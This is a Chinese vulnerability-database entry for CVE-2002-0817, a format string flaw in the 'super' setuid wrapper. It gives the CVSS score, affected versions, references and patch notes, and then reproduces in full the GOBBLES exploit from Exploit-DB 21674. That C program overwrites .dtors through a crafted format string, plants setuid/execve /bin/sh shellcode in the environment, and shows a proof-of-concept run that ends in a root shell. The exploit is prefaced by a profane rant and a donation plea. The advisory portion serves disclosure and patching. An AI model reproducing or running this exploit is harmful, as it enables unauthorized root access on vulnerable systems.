CVE-2002-0817
CVSS7.2
发布时间 :2002-08-12 00:00:00
修订时间 :2016-10-17 22:22:06
NMCOE    

[原文]Format string vulnerability in super for Linux allows local users to gain root privileges via a long command line argument.


[CNNVD]William Deich Super SysLog 格式化字符串漏洞(CNNVD-200208-122)

        Linux的super存在格式化字符串漏洞。本地用户可以借助超长命令行参数提升根特权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:william_deich:super:3.16
cpe:/a:william_deich:super:3.17
cpe:/a:william_deich:super:3.18
cpe:/a:william_deich:super:3.12

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0817
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0817
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-122
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0045.html
(UNKNOWN)  VULNWATCH  20020730 The SUPER Bug
http://marc.info/?l=bugtraq&m=102812622416695&w=2
(UNKNOWN)  BUGTRAQ  20020731 The SUPER Bug
http://www.debian.org/security/2002/dsa-139
(VENDOR_ADVISORY)  DEBIAN  DSA-139
http://www.iss.net/security_center/static/9741.php
(UNKNOWN)  XF  super-syslog-format-string(9741)
http://www.securityfocus.com/bid/5367
(UNKNOWN)  BID  5367

- 漏洞信息

William Deich Super SysLog 格式化字符串漏洞
高危 格式化字符串
2002-08-12 00:00:00 2005-05-02 00:00:00
本地  
        Linux的super存在格式化字符串漏洞。本地用户可以借助超长命令行参数提升根特权。

- 公告与补丁

        FreeBSD has released a Security Notice FreeBSD-SN-02:05. Users of FreeBSD systems are strongly urged to upgrade their ports tree to fix various reported issues. Further information can be found in the referenced Security Notice.
        Fixes available:
        William Deich super 3.12
        
        William Deich super 3.16
        
        William Deich super 3.17
        
        William Deich super 3.18
        

- 漏洞信息 (21674)

William Deich Super 3.x SysLog Format String Vulnerability (EDBID:21674)
linux local
2002-07-31 Verified
0 gobbles
N/A [点击下载]
source: http://www.securityfocus.com/bid/5367/info

super is prone to a format string vulnerability. This problem is due to incorrect use of the syslog() function to log error messages. It is possible to corrupt memory by passing format strings through the vulnerable logging function. This may potentially be exploited to overwrite arbitrary locations in memory with attacker-specified values. 

/*
 * SAVE DEFCON..HELP GOBBLES..SAVE DEFCON..HELP GOBBLES
 *
 * When GOBBLES say he and he security team
 * are non-profit. He really mean NON-profit.
 * This means GOBBLES and he GOBBLES Security
 * Labs (GSL) friends do not have much funds.
 *
 * GOBBLES was hoping to receive the money 
 * for speaking at the defcon gathering of
 * security enthusiasts up front. So he could buy 
 * and pay for he ticket to Las Vegas from the great city
 * of Baltimore where he currently resides.
 *
 * GOBBLES is not selling out.  GOBBLES is just admitting that he
 * need your help.  Please, help GOBBLES!
 *
 * After many e-mails to defcon organisers it became
 * apparent to GOBBLES this was not going to happen.
 * This mean GOBBLES has no way of getting to defcon.
 * This also mean GOBBLES cannot deliver he talk that
 * are named "Wolves among us". Alot of time and work
 * went into the preperation of this talk and it was
 * to be the grand finale of the year of the turkey
 * (2002). With many new 0-day to give out and many
 * great anouncements to be made.
 *
 * Thanks to Jeff Moss (dt@defcon.org, jmoss@blackhat.com) 
 * you, the defcon attendee, may very well get cheated out 
 * of attending one of the most provocative and daring
 * events defcon history has ever seen. 
 *
 * 	!!! ITS NOT TOO LATE..BUT HURRY !!!
 * 
 * Help GOBBLES go to defcon. GOBBLES give so much to
 * the community..is it not time the community now help
 * a poverty stricken turkey to spread his wings and fly
 * towards fame and glory? 
 *
 * Reasons why you should help GOBBLES get to defcon:
 *  
 * -- Paying for GOBBLES plane ticket to Vegas is better than spending $300 on a stripper
 *
 * -- Seeing GOBBLES present naked: Priceless.
 * 
 * -- Zeroday (possible hardcover) GOBBLES comic
 *
 * -- A chance to buy GOBBLES art
 *
 * -- A chance to receive _free_ GOBBLES T-shirts
 * 
 * -- Copies of those exploits you couldn't code
 *
 *
 * What does GOBBLES need?
 *
 * Basically GOBBLES need to round up 300 US dollars before saturday.
 * "Wolves among us" is sheduled for the last day of defcon.
 * Namely 3PM on Sunday August 4th. As you can very well imagine
 * this talk was going to blow the lid off of more dirty secrets
 * than there are noodles in China. With your help GOBBLES can still 
 * make this happen. So what GOBBLES is asking for is a little helping
 * hand from the community. If anyone has the funds to sponsor GOBBLES
 * to come to defcon please contact GOBBBLES at GOBBLES@hushmail.com.
 *
 *     !!! TURKEY SUPPORTERS...DO NOT LET THE TURKEY BE SILENCED !!!
 *
 * GOBBLES accepts Western Union payments.  GOBBLES will not accept anything
 * beyond the amount needed for travel to Vegas and back.  GOBBLES is not 
 * selling out, GOBBLES is asking help from those penetrators and researchers
 * that GOBBLES helps every day.
 *
 * In other news, ISS rejected GOBBLES request for a job application.  It 
 * seems that they're afraid of getting scalp'd.
 *
 * 			     Political statement:
 * HALT THE SNOSOFT ABUSE OF 14 YEAR OLDS. MAKING CHILDREN SLAVE OVER 3 LINE
 * PERL EXPLOITS FOR LESS THAN MINIMUM WAGE IS NOT VERY ETHICAL !!!
 *
 * FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN  
 * JAIL W00W00 JAIL W00W00 JAIL W000W0 JAIL W00W00 JAIL W00W00 JAIL W00W00
 * FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM
 */

/*
 * GOBBLES-own-super.c 
 *  -- root exploit for root hole in root wrapper
 * 
 * Super is sudo wannabe that boasts much security.
 * GOBBLES think people who write setuid wrappers
 * should learn to program securely before opening
 * big hoohoo about how secure program is.
 *
 * Current super version (3.18):
   -- ftp://ftp.ucolick.org/pub/users/will/
 * 
 * Super maintainer say following about he code:
 *
 * "Super allows an admin to control access to files
 *  and functions for users. It is similar to sudo, but 
 *  uses a different approach in the configuration file."
 *
 * Problem:
 * 
 * When super is compiled to use syslog(3) for its logging
 * of error messages the following lines makes pre-auth
 * local root exploitation rather trivial:
 * 
 * From error.c 
 * ... 
 * #define SysLog(pri, buf) syslog((pri), (buf))
 * ...
 * SysLog(error_priority, buf);
 * ...
 *
 * This means users that are not in the super config file
 * will be able to execute code with root priviledges.
 *
 * "Super acts as a SetUID wrapper around system commands
 *  to make sure the commands are executed safely, and
 *  only by authorized users."
 *
 * 		hehehe ;PPpPPPPp
 *
 * Love, 
 * GOBBLES
 * GOBBLES@hushmail.com
 * 
 * Official site: http://www.bugtraq.org
 * Official mirror: http://www.immunitysec.com/GOBBLES/
 */

/* Proof Of Concept:

$ gcc GOBBLES-own-super.c -o GOBBLES-own-super   
$ ./GOBBLES-own-super 

Usage: 
./GOBBLES-own-super -t <.dtors address> [ -o <offset> -A <allignment> ]

$ objdump -s -j .dtors /usr/local/bin/super

/usr/local/bin/super:     file format elf32-i386

Contents of section .dtors:
 8063f7c ffffffff 00000000                    ........        

$ ./GOBBLES-own-super -t 0x8063f7c
. target @ 0x8063f80
. shellcode @ 0xbfffffb0
. username: 9 bytes
super: No such super command as `xx��%.49103x%29$hn%.16305x%30$hn'.
sh-2.05# 

*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <pwd.h>
#include <sys/types.h>

#define ALLIGN		2 
#define DPA		29 	

#define SUPER		"/usr/local/bin/super"

void buildstring(unsigned long t, unsigned long w, int dpa, int allign);
void stuff(void);

extern char **environ;
char string[256];

int
main(int argc, char **argv)
{
	unsigned long t, w;
	int dpa, allign, shift = 0;
	char c, *store;	

	if(argc == 1) {
		fprintf(stderr, "\nUsage: \n%s -t <.dtors address> [ -o <offset> -A <allignment> ]\n", argv[0]);
		exit(0);
	}
	
	allign = ALLIGN;
	dpa = DPA;
	
	while((c = getopt(argc, argv, "t:o:A:")) != EOF) {
		switch(c) {
			case 't':
				sscanf(optarg, "%p", &store);
				t = (long)store;
			 	t += 4;
				break;
			case 'o':
				dpa = atoi(optarg);
				break;
			case 'A':
				allign = atoi(optarg);
				break;
			default:
				fprintf(stderr, "hehehe ;PPppPPPp\n");
				exit(0);
		}
	}
	
	store = NULL;

	if((store = getenv("GOBBLES")) == NULL) {
		stuff();
		if(execve(argv[0], argv, environ)) {
			fprintf(stderr, ". problem re-executing\n");
			exit(1);
		}
	}
	
	w = (long)store;
	// shift is signed so this works both ways
	shift = (strlen(argv[0]) - strlen(SUPER));
	w += shift;
	
	fprintf(stderr, ". target @ %p\n. shellcode @ %p\n", t, w);
			
	buildstring(t, w, dpa, allign);
	
	if(execl(SUPER, "super", string, NULL)) {
		fprintf(stderr, "error executing\n");
		exit(1);
	}
}

void 
buildstring(unsigned long t, unsigned long w, int dpa, int allign)
{
	unsigned int un, deux, x, b[4], namelen;
	char a_buf[4];
	struct passwd *pass;	

	memset(string, '\0', sizeof(string));
	memset(a_buf, '\0', sizeof(a_buf));
	
	if((pass = getpwuid(getuid())) == NULL) {
		fprintf(stderr, ". can't find your username\n");
		exit(1);
	}
 
	namelen = strlen(pass->pw_name);

	fprintf(stderr, ". username: %d bytes\n", namelen);

	for(x = 0; x < allign && x < sizeof(a_buf); x++)
		a_buf[x] = 'x';

	b[0] = (t & 0x000000ff);
	b[1] = (t & 0x0000ff00) >> 8;
	b[2] = (t & 0x00ff0000) >> 16;
	b[3] = (t & 0xff000000) >> 24; 

	un = (w >> 16) & 0xffff;
	deux = w & 0xffff; 

	if(un < deux) {
                snprintf(string, sizeof(string)-1, 
			"%s" 
			"%c%c%c%c%c%c%c%c"  
			"%%.%hdx" "%%%d$hn" 
			"%%.%hdx" "%%%d$hn",
                        a_buf, 
			b[0] + 2, b[1], b[2], b[3], b[0], b[1], b[2], b[3],
                        un - (8 + allign + 29 + namelen), 
			dpa, deux - un, dpa + 1 
			
		);
        }
        else {
                snprintf(string, sizeof(string)-1, 
			"%s" 
			"%c%c%c%c%c%c%c%c" 
			"%%.%hdx" "%%%d$hn" 
			"%%.%hdx" "%%%d$hn",
                        a_buf, 
			b[0], b[1], b[2], b[3], b[0] + 2, b[1], b[2], b[3],
                        deux - (8 + allign + 29 + namelen), 
			dpa, un-deux, dpa + 1
			
		);
        }
}

void  
stuff(void)
{
        char code[] = // the setuid 0 with the execve of the /bin/sh
	"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
	"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
	"\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
	"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
	setenv("GOBBLES", code, 1);
}

		

- 漏洞信息

5075
Linux Super Format String Elevated Privileges
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-04-09 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站